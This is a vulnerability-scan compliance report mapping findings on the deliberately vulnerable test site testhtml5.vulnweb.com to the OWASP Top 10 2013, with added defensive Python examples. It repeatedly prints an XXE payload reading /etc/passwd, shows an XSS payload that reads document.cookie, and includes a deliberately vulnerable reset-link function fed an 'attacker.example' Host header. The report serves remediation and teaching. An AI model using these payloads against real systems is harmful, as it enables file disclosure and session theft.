OWASP Top 10 2013 Compliance Report - E-SPIN Group
Description
The primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic techniques to protect against these high-risk problem areas, and also provides guidance on where to go from here.
Disclaimer
This document or any of its content cannot account for, or be included in, any form of legal advice. The outcome of a vulnerability scan (or security evaluation) should be used to ensure that diligent measures are taken to lower the risk of potential exploits carried out to compromise data. Legal advice must be supplied according to its legal context. All laws, and the environments in which they are applied, are constantly changed and revised. Therefore no information provided in this document may ever be used as an alternative to a qualified legal body or representative. A portion of this report is taken from OWASP's Top Ten 2013 Project document, which can be found at http://www.owasp.org.
Scan
URL: http://testhtml5.vulnweb.com:80/
Scan date: 25/03/2016 7:28:40
Duration: 29 minutes, 55 seconds
Profile: Default
Compliance at a Glance
This section of the report is a summary and lists the number of alerts found according to individual compliance categories.
Injection (A1) -
No alerts in this category
Broken Authentication and Session Management (A2) -
Total number of alerts in this category: 1
Cross Site Scripting (XSS) (A3) -
Total number of alerts in this category: 11
Insecure Direct Object Reference (A4) -
No alerts in this category
Security Misconfiguration (A5) -
Total number of alerts in this category: 7
Sensitive Data Exposure (A6) -
Total number of alerts in this category: 16
Missing Function Level Access Control (A7) -
Total number of alerts in this category: 3
Cross Site Request Forgery (CSRF) (A8) -
No alerts in this category
Using Components with Known Vulnerabilities (A9) -
Total number of alerts in this category: 7
Unvalidated Redirects and Forwards (A10) -
No alerts in this category
Compliance According to Categories: A Detailed Report
This section is a detailed report that explains each vulnerability found according to individual compliance categories.
(A1) Injection
Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
No alerts in this category.
(A2) Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.
Total number of alerts in this category: 1
Alerts in this category
Basic authentication over HTTP
In the context of an HTTP transaction, basic access authentication is a method for an HTTP user agent to provide a username and password when making a request. This directory is protected using Basic Authentication over an HTTP connection. With Basic Authentication the user credentials are sent in cleartext (Base64-encoded, not encrypted) on every request, and because HTTPS is not used they are vulnerable to packet sniffing.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /admin/
Affected parameter
Variants 1
(A3) Cross Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser, which can hijack user sessions, deface websites, or redirect the user to malicious sites.
Total number of alerts in this category: 11
Alerts in this category
Cross site scripting (verified)
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it will execute the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser.
CVSS Base Score: 6.4 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: None - Integrity Impact: Low - Availability Impact: None
CWE CWE-79
Affected item /comment
Affected parameter
Variants 1
Affected item /comment
Affected parameter id
Variants 1
Affected item /like
Affected parameter
Variants 1
Affected item /like
Affected parameter id
Variants 1
Affected item /report
Affected parameter
Variants 1
Affected item /report
Affected parameter id
Variants 1
DOM-based cross site scripting
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to another user. Because a browser cannot know whether the script should be trusted, it will execute the script in the user's context, allowing the attacker to access any cookies or session tokens retained by the browser. While a traditional cross-site scripting vulnerability occurs in the server-side code, document object model (DOM) based cross-site scripting is a type of vulnerability that affects the script code running in the client's browser. The payload may never reach the server at all (for example when it is carried in the URL fragment), so server-side filtering and logging can miss it; the fix belongs in the client-side script.
CVSS Base Score: 4.4 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: None - Integrity Impact: Partial - Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: None - Integrity Impact: Low - Availability Impact: None
CWE CWE-79
Affected item /
Affected parameter
Variants 5
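Added example, not code from this report or from the scanned application: the three reflected findings above all concern the id parameter of /comment, /like and /report, and the fix is output encoding chosen per context (HTML text or attribute, URL parameter, JavaScript string literal) rather than input filtering. The payload and the page fragments are constructed for illustration. The DOM-based finding on / has to be fixed in the client-side script instead (assign untrusted values with textContent rather than innerHTML or document.write), which this server-side example does not cover.

```python
import html
import json
from urllib.parse import quote

# Constructed payload of the kind a scanner submits to the id parameter
# (not the scanner's actual test string).
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_unsafe(comment_id: str) -> str:
    """Vulnerable form: the untrusted value is concatenated straight into the page,
    so a value that closes the attribute and opens a <script> tag executes."""
    return (f'<a href="/comment?id={comment_id}">comment {comment_id}</a>'
            f'<script>var commentId = "{comment_id}";</script>')


def encode_html(value: str) -> str:
    """For HTML text nodes and quoted attribute values: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_url_param(value: str) -> str:
    """For a value placed inside a URL query string: percent-encode everything
    except unreserved characters (safe="" also encodes '/')."""
    return quote(value, safe="")


def encode_js_string(value: str) -> str:
    """For a value placed inside a JavaScript string literal in a <script> block:
    json.dumps yields a quoted, escaped literal; < and > are additionally escaped so
    that a '</script>' inside the value cannot terminate the script element."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def render_safe(comment_id: str) -> str:
    """Hardened form: each interpolation uses the encoder for its context.
    The href value is URL-encoded first, then attribute-encoded like any attribute."""
    href = "/comment?id=" + encode_url_param(comment_id)
    return (f'<a href="{encode_html(href)}">comment {encode_html(comment_id)}</a>'
            f'<script>var commentId = {encode_js_string(comment_id)};</script>')


def contains_script_tag(markup: str) -> bool:
    """Crude check used only to contrast the two renderings."""
    return "<script>alert" in markup.lower()


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
```

The same value is encoded three different ways in render_safe because each sink has its own grammar; one encoder applied everywhere is the usual reason an XSS fix fails to hold.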
(A4) Insecure Direct Object Reference
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
No alerts in this category.
(A5) Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.
Total number of alerts in this category: 7
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without the --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file. The scanner typically infers this from the version in the Server header, so confirm the build options (nginx -V) and the listen directives before treating it as exploitable; the fix is to upgrade to 1.4.7 / 1.5.12 or later.
CVSS Base Score: 5.1 - Access Vector: Network - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name, or common variations on these themes. Here the guessed credentials belong to the Basic Authentication on /admin/, the same directory reported under A2, so they also travel in cleartext.
CVSS Base Score: 7.5 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item /admin/
Affected parameter
Variants 2
XML external entity injection
XML supports a facility known as "external entities", which instructs an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text, thus initiating an unexpected file open operation, an HTTP transfer, or access to whatever system IDs the XML processor knows how to access. Below is a sample XML document that uses this functionality to include the contents of a local file (/etc/passwd):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
  <!ENTITY acunetixent SYSTEM "file:///etc/passwd">
]>
<xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Changed - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
Cookie without HttpOnly flag set
This cookie does not have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser that the cookie can only be accessed by the server and not by client-side scripts. This is an important protection for session cookies, because it stops a successful XSS attack (such as the ones reported under A3) from reading the session token directly.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from a domain other than the one the resource originated from. The Access-Control-Allow-Origin header indicates whether a resource can be shared, by returning the value of the Origin request header, "*", or "null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin, so any website can make XHR (XMLHttpRequest) requests to your site and read the responses. Using Access-Control-Allow-Origin: * is not recommended. Note that a browser will not send credentials (cookies or HTTP authentication) on a request answered with the wildcard, so this exposes responses that are not tied to a user session; the more serious variant is a server that reflects an arbitrary Origin value and also sets Access-Control-Allow-Credentials: true.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
The HTTP OPTIONS method is enabled on this web server. The OPTIONS method returns the list of methods supported by the web server: it represents a request for information about the communication options available on the request/response chain identified by the Request-URI. On its own this is informational (OPTIONS is also what browsers use for CORS preflight requests); the actionable part is which methods the Allow header advertises, for example PUT, DELETE or TRACE.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
(A6) Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.
Total number of alerts in this category: 16
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without the --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file. The scanner typically infers this from the version in the Server header, so confirm the build options (nginx -V) and the listen directives before treating it as exploitable; the fix is to upgrade to 1.4.7 / 1.5.12 or later.
CVSS Base Score: 5.1 - Access Vector: Network - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name, or common variations on these themes. Here the guessed credentials belong to the Basic Authentication on /admin/, the same directory reported under A2, so they also travel in cleartext.
CVSS Base Score: 7.5 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item /admin/
Affected parameter
Variants 3
XML external entity injection
XML supports a facility known as "external entities", which instructs an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text, thus initiating an unexpected file open operation, an HTTP transfer, or access to whatever system IDs the XML processor knows how to access. Below is a sample XML document that uses this functionality to include the contents of a local file (/etc/passwd):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
  <!ENTITY acunetixent SYSTEM "file:///etc/passwd">
]>
<xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Changed - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 3
Host header attack
In many cases developers trust the HTTP Host header value and use it to generate links, import scripts and even generate password reset links. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels like password reset emails: a reset link built from an attacker-supplied Host delivers the reset token to the attacker's server when the victim clicks it.
CVSS Base Score: 2.6 - Access Vector: Local - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: None - Integrity Impact: Low - Availability Impact: None
CWE CWE-20
Affected item /like
Affected parameter
Variants 1
Clickjacking: X-Frame-Options header missing
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server did not return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. The Content-Security-Policy frame-ancestors directive is the standardized equivalent and should be set alongside X-Frame-Options.
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-693
Affected item Web Server
Affected parameter
Variants 1
Cookie without HttpOnly flag set
This cookie does not have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser that the cookie can only be accessed by the server and not by client-side scripts. This is an important protection for session cookies, because it stops a successful XSS attack (such as the ones reported under A3) from reading the session token directly.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
Insecure response with wildcard '*' in Access-Control-Allow-Origin
Cross-origin resource sharing (CORS) is a mechanism that allows restricted resources (e.g. fonts) on a web page to be requested from a domain other than the one the resource originated from. The Access-Control-Allow-Origin header indicates whether a resource can be shared, by returning the value of the Origin request header, "*", or "null" in the response. If a website responds with Access-Control-Allow-Origin: * the requested resource allows sharing with every origin, so any website can make XHR (XMLHttpRequest) requests to your site and read the responses. Using Access-Control-Allow-Origin: * is not recommended. Note that a browser will not send credentials (cookies or HTTP authentication) on a request answered with the wildcard, so this exposes responses that are not tied to a user session; the more serious variant is a server that reflects an arbitrary Origin value and also sets Access-Control-Allow-Credentials: true.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CWE CWE-16
Affected item /
Affected parameter
Variants 1
OPTIONS method is enabled
The HTTP OPTIONS method is enabled on this web server. The OPTIONS method returns the list of methods supported by the web server: it represents a request for information about the communication options available on the request/response chain identified by the Request-URI. On its own this is informational (OPTIONS is also what browsers use for CORS preflight requests); the actionable part is which methods the Allow header advertises, for example PUT, DELETE or TRACE.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item Web Server
Affected parameter
Variants 1
Possible sensitive directories
A possible sensitive directory has been found. This directory is not directly linked from the website. This check looks for common sensitive resources like backup directories, database dumps, administration pages and temporary directories. Each one of these directories could help an attacker to learn more about the target.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item /admin
Affected parameter
Variants 1
Affected item /static/app/services
Affected parameter
Variants 1
Possible virtual host found
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without requiring all services provided to use the same host name. This web server responds differently when the Host header is manipulated and various common virtual hosts are tested. This could indicate that a virtual host is present.
CVSS Base Score: 5.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item localhost
Affected parameter
Variants 1
Password type input with auto-complete enabled
When a new name and password are entered in a form and the form is submitted, the browser asks whether the password should be saved. Thereafter, when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser's stored form data. Note that most current browsers ignore autocomplete="off" on password fields, so this finding is informational; protecting the endpoint itself matters more than the attribute.
CVSS Base Score: 0.0 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: None
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item / (64adbddee16dbd3ed58373c9670b7daa)
Affected parameter
Variants 1
(A7) Missing Function Level Access Control
Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.
Total number of alerts in this category: 3
Alerts in this category
XML external entity injection
XML supports a facility known as "external entities", which instructs an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text, thus initiating an unexpected file open operation, an HTTP transfer, or access to whatever system IDs the XML processor knows how to access. Below is a sample XML document that uses this functionality to include the contents of a local file (/etc/passwd):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
  <!ENTITY acunetixent SYSTEM "file:///etc/passwd">
]>
<xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Changed - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
Host header attack
In many cases developers trust the HTTP Host header value and use it to generate links, import scripts and even generate password reset links. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. This can be exploited using web-cache poisoning and by abusing alternative channels like password reset emails: a reset link built from an attacker-supplied Host delivers the reset token to the attacker's server when the victim clicks it.
CVSS Base Score: 2.6 - Access Vector: Local - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: None
CVSS3 Base Score: 5.3 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: None - Integrity Impact: Low - Availability Impact: None
CWE CWE-20
Affected item /like
Affected parameter
Variants 1
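Added example, not code from this report or from the scanned application: the safe pattern for the Host header finding (reported here and under A6) is to validate the incoming Host against a configured allowlist and then build every absolute URL, including password reset links, from configuration rather than from the header. The canonical host, the token parameter name and the X-Forwarded-Host handling are assumptions; /forgotpw is the reset endpoint listed elsewhere in this report.

```python
# Assumed canonical deployment host (the report only gives the scan URL).
CANONICAL_BASE = "http://testhtml5.vulnweb.com"
ALLOWED_HOSTS = {"testhtml5.vulnweb.com"}


def reset_link_unsafe(headers: dict, token: str) -> str:
    """Vulnerable: the link the victim receives points wherever the Host header says.
    A request with Host: attacker.example produces a reset mail that leaks the token."""
    return f"http://{headers['Host']}/forgotpw?token={token}"


def normalize_host(host: str) -> str:
    """Lower-case, strip whitespace and a default port so the comparison is exact."""
    host = host.strip().lower()
    if host.endswith(":80"):
        host = host[:-3]
    return host


def validate_host(headers: dict) -> str:
    """Reject the request if Host, or X-Forwarded-Host when a proxy sets it (assumed
    deployment detail), is not one of ours. Returns the configured base URL."""
    for name in ("X-Forwarded-Host", "Host"):
        value = headers.get(name)
        if value is None:
            continue
        if normalize_host(value) not in ALLOWED_HOSTS:
            raise ValueError(f"rejected {name} header: {value!r}")
    return CANONICAL_BASE


def reset_link_safe(headers: dict, token: str) -> str:
    """Hardened: validate the header, then build the link from configuration only.
    The header value is never echoed, even after it passed validation."""
    base = validate_host(headers)
    return f"{base}/forgotpw?token={token}"


if __name__ == "__main__":
    print(reset_link_unsafe({"Host": "attacker.example"}, "t1"))
    print(reset_link_safe({"Host": "testhtml5.vulnweb.com:80"}, "t1"))
```

Rejecting an unknown Host with an error (rather than silently substituting the canonical one) also surfaces the probe in logs, which is where the cache-poisoning variant of this attack is first noticed.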
Clickjacking: X-Frame-Options header missing
Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. The server did not return an X-Frame-Options header, which means that this website could be at risk of a clickjacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. The Content-Security-Policy frame-ancestors directive is the standardized equivalent and should be set alongside X-Frame-Options.
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-693
Affected item Web Server
Affected parameter
Variants 1
(A8) Cross Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests that the vulnerable application thinks are legitimate requests from the victim.
No alerts in this category.
(A9) Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.
Total number of alerts in this category: 7
Alerts in this category
nginx SPDY heap buffer overflow
A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allows remote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with the ngx_http_spdy_module module (which is not compiled by default) and without the --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file. The scanner typically infers this from the version in the Server header, so confirm the build options (nginx -V) and the listen directives before treating it as exploitable; the fix is to upgrade to 1.4.7 / 1.5.12 or later.
CVSS Base Score: 5.1 - Access Vector: Network - Access Complexity: High - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CWE CWE-122
CVE CVE-2014-0133
Affected item Web Server
Affected parameter
Variants 1
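Added example, not code from this report: the same nginx finding is listed under A5, A6 and this category, and in each case the advisory text gives four conditions, not just a version range. This check applies all of them so that a banner-only match can be confirmed or dismissed. The nginx -V output (which nginx writes to stderr) and the configuration fragment are constructed samples, not captured from the target.

```python
import re

# Constructed `nginx -V` output; the real command prints this on stderr.
NGINX_V_OUTPUT = """nginx version: nginx/1.4.6
built by gcc 4.8.2 (Ubuntu 4.8.2-19ubuntu1)
TLS SNI support enabled
configure arguments: --prefix=/etc/nginx --with-http_ssl_module --with-http_spdy_module
"""

# Constructed nginx.conf fragment with the spdy listen option enabled.
NGINX_CONF = """server {
    listen 443 ssl spdy;
    server_name testhtml5.vulnweb.com;
}
"""


def parse_nginx_v(output: str):
    """Return (version, configure_args) from `nginx -V` output."""
    version = re.search(r"nginx version: nginx/(\d+\.\d+\.\d+)", output)
    args = re.search(r"configure arguments:(.*)", output)
    if not version:
        raise ValueError("no nginx version line found")
    return version.group(1), (args.group(1).strip() if args else "")


def parse_version(v: str) -> tuple:
    return tuple(int(x) for x in v.split("."))


def version_in_cve_2014_0133_range(version: str) -> bool:
    """1.3.15 <= v < 1.4.7, or 1.5.0 <= v < 1.5.12 (the ranges quoted in the advisory)."""
    v = parse_version(version)
    return (1, 3, 15) <= v < (1, 4, 7) or (1, 5, 0) <= v < (1, 5, 12)


def listen_uses_spdy(config_text: str) -> bool:
    """True if any `listen` directive carries the spdy option."""
    return re.search(r"^\s*listen\b[^;]*\bspdy\b", config_text, re.MULTILINE) is not None


def nginx_spdy_affected(version: str, configure_args: str, config_text: str) -> bool:
    """All conditions from the advisory must hold: vulnerable version, SPDY module
    compiled in, not a --with-debug build, and a listen directive enabling spdy."""
    return (version_in_cve_2014_0133_range(version)
            and "--with-http_spdy_module" in configure_args
            and "--with-debug" not in configure_args
            and listen_uses_spdy(config_text))


if __name__ == "__main__":
    ver, args = parse_nginx_v(NGINX_V_OUTPUT)
    print(ver, "affected" if nginx_spdy_affected(ver, args, NGINX_CONF) else "not affected")
```

Even when the check says "not affected", the version is still end-of-life and upgrading is the right outcome; the check only decides how urgently.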
Weak password
This page is using a weak password. Acunetix WVS was able to guess the credentials required to access this page. A weak password is short, common, a system default, or something that could be rapidly guessed by executing a brute force attack using a subset of all possible passwords, such as words in the dictionary, proper names, words based on the user name, or common variations on these themes. Here the guessed credentials belong to the Basic Authentication on /admin/, the same directory reported under A2, so they also travel in cleartext.
CVSS Base Score: 7.5 - Access Vector: Network - Access Complexity: Low - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 7.5 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Unchanged - Confidentiality Impact: High - Integrity Impact: None - Availability Impact: None
CWE CWE-200
Affected item /admin/
Affected parameter
Variants 1
XML external entity injection
XML supports a facility known as "external entities", which instructs an XML processor to retrieve and perform an inline include of XML located at a particular URI. An external XML entity can be used to append or modify the document type declaration (DTD) associated with an XML document. An external XML entity can also be used to include XML within the content of an XML document. Now assume that the XML processor parses data originating from a source under attacker control. Most of the time the processor will not be validating, but it MAY include the replacement text, thus initiating an unexpected file open operation, an HTTP transfer, or access to whatever system IDs the XML processor knows how to access. Below is a sample XML document that uses this functionality to include the contents of a local file (/etc/passwd):
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
  <!ENTITY acunetixent SYSTEM "file:///etc/passwd">
]>
<xxx>&acunetixent;</xxx>
CVSS Base Score: 6.8 - Access Vector: Network - Access Complexity: Medium - Authentication: None - Confidentiality Impact: Partial - Integrity Impact: Partial - Availability Impact: Partial
CVSS3 Base Score: 10 - Attack Vector: Network - Attack Complexity: Low - Privileges Required: None - User Interaction: None - Scope: Changed - Confidentiality Impact: High - Integrity Impact: High - Availability Impact: High
CWE CWE-611
Affected item /forgotpw
Affected parameter text/xml
Variants 1
